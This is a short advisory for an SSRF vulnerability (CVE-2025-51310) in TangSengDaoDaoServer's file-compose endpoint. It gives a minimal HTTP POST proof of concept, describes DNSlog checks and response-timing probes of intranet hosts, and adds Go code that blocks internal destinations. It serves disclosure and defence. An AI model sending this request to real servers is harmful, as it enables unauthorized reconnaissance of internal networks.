TangSengDaoDaoServer has an SSRF vulnerability

  • The /v1/file/compose/*path interface of TangSengDaoDaoServer has an SSRF vulnerability, which attackers can exploit to probe internal network services without logging in. (In the underlying implementation of http.Client, the default Transport (http.DefaultTransport) appears to handle only HTTP/HTTPS requests, so the potential impact of this SSRF vulnerability is relatively limited.)

POC

POST /api/v1/file/compose/a HTTP/1.1
Host: xxxxxx
......
Content-Type: application/json
Content-Length: 31

[
"http://[Domain/Ip]"
]

Affected version

  • v1.0.1~v1.0.5

Vulnerability location:

[Figures: four screenshots]

Vulnerability Exploitation Demonstration

  • Dnslog detection

[Figures: two screenshots]

  • In local environment testing, the response comes back very quickly when the intranet IP is present and very slowly when it is not. This timing difference can be used to probe other intranet services.

[Figures: three screenshots]
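One way to close the internal probing described above is to check the destination IP at dial time, after DNS resolution, so that names and redirects pointing at internal hosts are refused as well. This is an added example, not TangSengDaoDaoServer's code or its actual fix; `isPublicIP`, `dialControl`, `newFetchClient` and the sample addresses are constructed for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"syscall"
	"time"
)

var errBlocked = errors.New("destination address not allowed")

// isPublicIP rejects loopback, RFC 1918/ULA, link-local (including the
// 169.254.169.254 metadata address), unspecified and multicast addresses.
func isPublicIP(ip net.IP) bool {
	return !(ip.IsLoopback() || ip.IsPrivate() || ip.IsUnspecified() ||
		ip.IsLinkLocalUnicast() || ip.IsMulticast())
}

// dialControl runs on the already-resolved IP just before connect(), so a
// hostname or redirect that lands on an internal address is refused too.
func dialControl(_, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	// Fail closed: anything that is not a plain public IP is blocked.
	if ip := net.ParseIP(host); ip == nil || !isPublicIP(ip) {
		return errBlocked
	}
	return nil
}

// newFetchClient is a hypothetical replacement for the default http.Client
// when the server fetches user-supplied URLs.
func newFetchClient() *http.Client {
	d := &net.Dialer{Timeout: 5 * time.Second, Control: dialControl}
	return &http.Client{Timeout: 10 * time.Second,
		Transport: &http.Transport{DialContext: d.DialContext}} // Proxy left nil
}

// Constructed sample destinations; no traffic leaves the host for blocked ones.
func main() {
	for _, a := range []string{"10.0.0.5:80", "[::1]:6379", "93.184.216.34:443"} {
		fmt.Println(a, "->", dialControl("tcp", a, nil))
	}
	_, err := newFetchClient().Get("http://127.0.0.1:1/")
	fmt.Println("fetch of loopback URL:", err)
}
```

Because the refusal happens before any connection attempt, requests to present and absent internal addresses fail the same way, which removes the response-time difference used for probing.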

CVE

  • CVE-2025-51310